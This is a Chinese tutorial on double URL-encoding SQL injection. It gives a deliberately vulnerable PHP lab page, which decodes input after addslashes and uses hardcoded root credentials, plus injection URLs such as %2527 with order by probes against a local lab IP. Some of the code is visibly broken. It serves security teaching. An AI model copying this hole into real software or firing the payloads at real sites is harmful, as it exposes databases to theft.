7. 网易web安全渗透， sql漏洞之二次编码注入

二次编码注入原理

为什么要进行编码，有点应为原始的格式并不适合传输
比如

+  =  &  ;

要是上面的这个符号在http传输中会和原始的有冲突

原理

urlencode()函数就是URL编码的

$str = "%25";
echo 'urlencode($str);
?>

结果等于

%

上面的%25url解码后就是%

%27就是'

实战

实验环境搭建

应为没有实验环境我就自己写了一个
a.php文件
代码

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title></title>
</head>
<body>

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title></title>
</head>
<body>


	$id=addslashes($_GET['id']);
	$s = "127.0.0.1";
	$u= "root";
	$p = "123456";

	// 创建连接
	$conn = mysqli_connect($s, $u, $p);	 
	// 检测连接
	if (!$conn) {
	    die("连接失败： " . mysqli_connect_error());
	}



	

	$id=urldecode($id);

	
	mysqli_select_db($conn,'security');
	$a="SELECT * FROM users WHERE id='$id'";
	echo 'sql执行的语句： '.$a.'
';

	$b=mysqli_query($conn,$a);
	echo '输出结果:';
	$DuQu=mysqli_fetch_assoc($b);

	if ($DuQu) {
		echo "\"".$DuQu['username']."\"".$DuQu['password']."
";
	}

	mysqli_close($conn);

?>


</body>
</html>

输入?id=1
结果

二次编码进行注入

发现漏洞

输入URL：?id=1'
结果被转意了

我们在进行宽字节注入
还是不行

我们就可以用二次编码注入进行注入了
URL地址http://192.168.0.105/a.php?id=1%2527
发现叫\给去掉了
是存在sql注入漏洞的

进行数据读取

1. 判断有几列
   URL地址http://192.168.0.105/a.php?id=1%2527 order by 3 --+
   显示正常
   
   URL地址http://192.168.0.105/a.php?id=1%2527 order by 4 --+
   报错
   
   等等等等等等等等等等等等等等就不演示了